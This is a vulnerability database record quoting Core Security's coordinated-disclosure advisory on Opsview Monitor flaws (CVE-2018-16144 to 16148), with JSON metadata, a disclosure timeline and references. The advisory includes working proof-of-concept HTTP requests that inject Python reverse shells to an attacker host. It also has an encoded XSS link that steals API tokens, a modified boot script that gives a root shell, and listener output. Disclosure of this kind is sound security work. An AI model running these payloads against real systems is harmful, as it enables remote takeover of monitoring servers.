XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. This\ntoken could be obtained by a Cross-Site Scripting attack from a specific\nendpoint (/settings). Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. **Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. \n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. \n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16145",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17451",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16145",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"id": "VAR-201809-0903",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
}
]
},
"last_update_date": "2023-12-18T12:01:17.674000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Local Privilege Escalation Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139523"
},
{
"title": "Opsview Monitor Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84506"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-732",
"trust": 1.0
},
{
"problemtype": "CWE-264",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/732.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%2foiiplzt1c2vybmftzsa9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3zhcib4ahiyid0gbmv3ifhnteh0dhbszxf1zxn0kck7eghymi5vcgvukcdqt1nujywgjy9yzxn0l2nvbmzpzy9ub3rpzmljyxrpb25tzxrob2qvdgvzdg5vdglmawnhdglvbi8nlcb0cnvlktt4ahiylnnldfjlcxvlc3rizwfkzxioingtb3bzdmlldy11c2vybmftzsisihvzzxjuyw1lkttjb25zb2xllmxvzyh1c2vybmftzsk7y29uc29szs5sb2codg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiec1vchn2awv3lxrva2vuiiwgdg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiq29udgvudc1uexbliiwgimfwcgxpy2f0aw9ul2pzb24ikttib2r5id0geyjtzxnzywdlijoivgvzdcbnzxnzywdliiwiy29tbwfuzci6inn1ym1pdf94bxbwx3njcmlwdcisinzhcmlhymxlcyi6w10sinrlc3rfdmfyawfibgvzijpbeyjuyw1lijoiuefhrviilcj2ywx1zsi6ijeymzeymzeymyb8fcbwexrob24glwmgj2ltcg9ydcbzb2nrzxqsc3vichjvy2vzcyxvcztzpxnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsc29ja2v0llnpq0tfu1rsrufnkttzlmnvbm5ly3qokfwipgf0dgfja2vysva%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.627000",
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17451"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16145"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010273"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-16145"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Vulnerabilities related to authorization, permissions, and access control",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010273"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-154"
}
],
"trust": 0.6
}
}
VAR-201809-0904
Vulnerability from variot - Updated: 2023-12-18 12:01The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account. Opsview Monitor The monitor contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues. Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could be abused to execute malicious JavaScript code in the context of a legitimate user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1. Reflected Cross-Site Scripting in Diagnostics
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
